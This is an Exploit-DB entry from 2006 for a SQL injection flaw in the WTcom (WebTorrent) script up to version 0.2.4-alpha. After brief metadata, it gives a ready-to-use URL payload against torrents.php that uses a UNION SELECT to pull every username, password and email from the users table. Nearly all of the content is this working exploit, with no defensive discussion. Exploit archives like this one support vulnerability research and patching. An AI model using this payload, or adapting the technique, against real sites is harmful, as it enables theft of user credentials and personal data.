WTcom <= 0.2.4-alpha torrents.php Remote SQL Injection Vulnerability

2006-08-17T00:00:00
ID EDB-ID:2200
Type exploitdb
Reporter sh1r081
Modified 2006-08-17T00:00:00

Description

WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability. CVE-2006-4238. Webapps exploit for php platform

                                        
                                            # WebTorrent (WTcom) Script &lt;= 0.2.4
# ----------------------------------
# &gt;&gt;&gt; Remote SQL Injection
# &lt;&lt;&lt; Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# milw0rm.com [2006-08-17]